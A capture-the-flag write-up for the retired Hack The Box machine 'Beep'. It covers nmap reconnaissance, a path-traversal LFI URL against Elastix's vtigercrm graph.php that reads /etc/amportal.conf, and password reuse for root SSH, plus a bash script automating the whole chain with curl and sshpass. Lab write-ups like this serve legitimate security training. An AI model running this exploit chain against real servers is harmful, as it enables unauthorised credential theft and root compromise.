Beep

Name: Beep
Release Date: 15 Mar 2017
Retire Date: 16 Oct 2017
OS: Linux
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
rkmylo 23 days, 20 hours, 30 mins, 10 seconds
rkmylo 23 days, 20 hours, 30 mins, 24 seconds
Creator: ch4p
CherryTree File: CherryTree - Remove the .txt extension

Start with nmap -sC -sV -oA ./beep 10.10.10.7 as always

 
$  nmap -sC -sV -oA ./beep 10.10.10.7
  Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-29 15:05 EDT
  Nmap scan report for 10.10.10.7
  Host is up (0.069s latency).
  Not shown: 988 closed ports
  PORT      STATE SERVICE    VERSION
  22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
  | ssh-hostkey: 
  |   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
  |_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
  25/tcp    open  smtp       Postfix smtpd
  |_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
  80/tcp    open  http       Apache httpd 2.2.3
  |_http-server-header: Apache/2.2.3 (CentOS)
  |_http-title: Did not follow redirect to https://10.10.10.7/
  |_https-redirect: ERROR: Script execution failed (use -d to debug)
  110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
  |_pop3-capabilities: TOP PIPELINING UIDL STLS USER APOP IMPLEMENTATION(Cyrus POP3 server v2) AUTH-RESP-CODE EXPIRE(NEVER) RESP-CODES LOGIN-DELAY(0)
  111/tcp   open  rpcbind    2 (RPC #100000)                                                                                                                 
  143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4                                                                                    
  |_imap-capabilities: UIDPLUS NO LISTEXT Completed OK MAILBOX-REFERRALS URLAUTHA0001 LIST-SUBSCRIBED BINARY CONDSTORE IMAP4rev1 IDLE THREAD=ORDEREDSUBJECT CATENATE ACL
    QUOTA MULTIAPPEND ANNOTATEMORE UNSELECT IMAP4 THREAD=REFERENCES LITERAL+ STARTTLS ATOMIC CHILDREN NAMESPACE ID SORT=MODSEQ SORT X-NETSCAPE RENAME RIGHTS=kxte
  443/tcp   open  ssl/https?
  |_ssl-date: 2020-03-29T19:09:38+00:00; +14s from scanner time.
  993/tcp   open  ssl/imap   Cyrus imapd
  |_imap-capabilities: CAPABILITY
  995/tcp   open  pop3       Cyrus pop3d
  3306/tcp  open  mysql?
  |_mysql-info: ERROR: Script execution failed (use -d to debug)
  4445/tcp  open  upnotifyp?
  10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
  |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
  Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

  Host script results:
  |_clock-skew: 13s

  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 364.92 seconds
 

There are a lot of services to look at on this one: SSH, SMTP, HTTP, HTTPS, POP3 and IMAP (plain and over TLS), MySQL, rpcbind, and a few non-standard ones (4445, and Webmin on 10000). The SMTP, POP3/IMAP and HTTP/S combination leads me to believe this is some kind of mail server. Let's fire up Dirbuster with a medium wordlist and navigate to the HTTP site while it is running. Doing so presents us with an "Elastix" login page.

Checking out the source of the login page doesn't yield anything useful. Let's pull some Google-Fu and see what's out there for Elastix (a CentOS-based PBX distribution built around Asterisk and FreePBX, which also bundles the Postfix/Cyrus mail stack seen in the scan). We eventually come across a Local File Inclusion vulnerability in the bundled vtigercrm module. ExploitDB/Searchsploit (searchsploit elastix) will help you tremendously in your efforts.

Looking at the ExploitDB and Searchsploit results (https://www.exploit-db.com/exploits/37637, the Elastix graph.php LFI), we locate a string to try out:
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
The current_language parameter is included without sanitisation, the ../ chain walks back to the filesystem root, and the trailing %00 truncates whatever the script appends to the path, so the server returns /etc/amportal.conf, the FreePBX/Asterisk configuration, as a large text file. Dig through it for the AMPDBPASS attribute: that is the Asterisk MySQL password, and it also turns out to be the password for the web login portal.

So now we can log into the web portal. I'm not going to go into too much detail on the web interface because it is a huge rabbit hole. Instead, I look at everything else. Just for kicks, let's see if we can SSH with that AMPDBPASS. This will tell us whether the web "admin" user and the system root user are using the same credentials.

It looks like they are using the same credentials. No privesc required. Just ssh root@10.10.10.7 with the AMPDBPASS and this box is done! One caveat: the server runs OpenSSH 4.3, so a current OpenSSH client will refuse its legacy algorithms by default and you may have to re-enable them for this one connection (for example -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa).
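The whole chain (LFI read of /etc/amportal.conf, extract AMPDBPASS, reuse it over SSH) as an added shell example. This is not code from the original writeup: the target address and the graph.php URL are the ones above, the sample amportal.conf content is constructed here to exercise the parser offline, and the use of sshpass and the legacy SSH algorithm options are assumptions for the final step.

```shell
#!/usr/bin/env bash
# Added example, not from the original writeup. Assumes the target 10.10.10.7
# and the graph.php LFI path from EDB 37637; sshpass is assumed to be installed.

TARGET="${TARGET:-10.10.10.7}"

# Build the LFI URL for an arbitrary absolute path. The ../ chain walks back
# to /, and the trailing %00 truncates whatever graph.php appends after the
# current_language value, so the raw file is included as-is.
lfi_url() {
    local host="$1" path="$2"
    path="${path#/}"   # the traversal prefix already ends in /
    printf 'https://%s/vtigercrm/graph.php?current_language=../../../../../../../..//%s%%00&module=Accounts&action' \
        "$host" "$path"
}

# Read a file through the LFI. -k because the box presents a self-signed
# certificate. Only run against the live target (see --live below).
lfi_fetch() {
    curl -sk "$(lfi_url "$1" "$2")"
}

# Pull one KEY=value out of amportal.conf text on stdin. Tolerates leading
# whitespace, "KEY = value" spacing and double-quoted values, skips comment
# lines, and returns only the first match.
conf_value() {
    local key="$1"
    sed -n -E \
        -e '/^[[:space:]]*#/d' \
        -e "s/^[[:space:]]*${key}[[:space:]]*=[[:space:]]*\"?([^\"[:space:]]*)\"?.*$/\1/p" \
        | head -n 1
}

# Constructed stand-in for what the LFI returns; not the real box's file.
SAMPLE_CONF='# This file is part of FreePBX.
AMPDBHOST=localhost
AMPDBENGINE=mysql
AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
 AMPDBPASS=examplePassw0rd
AMPENGINE=asterisk
AMPMGRUSER=admin
AMPMGRPASS = "mgrSecret"'

# Reuse the recovered password as root. OpenSSH 4.3 only offers legacy
# key-exchange and host-key algorithms, so a current client needs them
# re-enabled for this connection (assumption: sshpass is available).
ssh_as_root() {
    local host="$1" pass="$2"
    sshpass -p "$pass" ssh \
        -oKexAlgorithms=+diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 \
        -oHostKeyAlgorithms=+ssh-rsa,ssh-dss \
        "root@${host}"
}

# Offline demonstration against the constructed sample:
#   printf '%s\n' "$SAMPLE_CONF" | conf_value AMPDBPASS   -> examplePassw0rd
# Against the live target: ./beep.sh --live
if [ "${1:-}" = "--live" ]; then
    pass="$(lfi_fetch "$TARGET" /etc/amportal.conf | conf_value AMPDBPASS)"
    [ -n "$pass" ] && ssh_as_root "$TARGET" "$pass"
fi
```

conf_value is deliberately a little more forgiving than the one-line grep you would type interactively: hand-edited FreePBX configs in the wild have indented keys, spaces around the equals sign and quoted values, and a parser that silently returns nothing on those would send you down the wrong path.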